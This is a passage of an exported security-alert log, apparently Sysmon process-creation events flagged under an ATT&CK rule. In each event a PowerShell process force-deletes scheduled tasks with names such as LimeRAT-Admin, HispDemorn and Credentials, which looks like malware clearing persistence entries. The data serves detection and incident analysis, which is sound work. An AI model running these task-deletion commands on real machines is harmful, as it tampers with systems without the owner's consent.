Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.923"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-001042763100}"",""processId"":""8076"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN LimeRAT-Admin /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.670",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.889 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-0010b4743100} +ProcessId: 7060 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HispDemorn /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.893007100Z"",""eventRecordID"":""3978"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.889\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-0010b4743100}\r\nProcessId: 7060\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.889"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-0010b4743100}"",""processId"":""7060"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HispDemorn /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.654",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.764 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-0010866b3100} +ProcessId: 608 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN werclpsyport /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.779707300Z"",""eventRecordID"":""3977"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.764\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-0010866b3100}\r\nProcessId: 608\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.764"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-0010866b3100}"",""processId"":""608"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN werclpsyport /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.638",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.671 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-0010fd683100} +ProcessId: 7672 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN TablteInputout /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.716446300Z"",""eventRecordID"":""3976"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.671\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-0010fd683100}\r\nProcessId: 7672\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.671"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-0010fd683100}"",""processId"":""7672"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN TablteInputout /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.623",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.446 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-0010ec653100} +ProcessId: 7912 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Credentials /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.549519000Z"",""eventRecordID"":""3975"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.446\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-0010ec653100}\r\nProcessId: 7912\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.446"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-0010ec653100}"",""processId"":""7912"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Credentials /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.609",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.401 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-00101d643100} +ProcessId: 868 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WebServers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.406960300Z"",""eventRecordID"":""3974"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.401\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-00101d643100}\r\nProcessId: 868\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.401"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-00101d643100}"",""processId"":""868"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WebServers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.602",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.345 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-001002613100} +ProcessId: 5728 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsScan /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.348118700Z"",""eventRecordID"":""3973"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.345\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-001002613100}\r\nProcessId: 5728\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 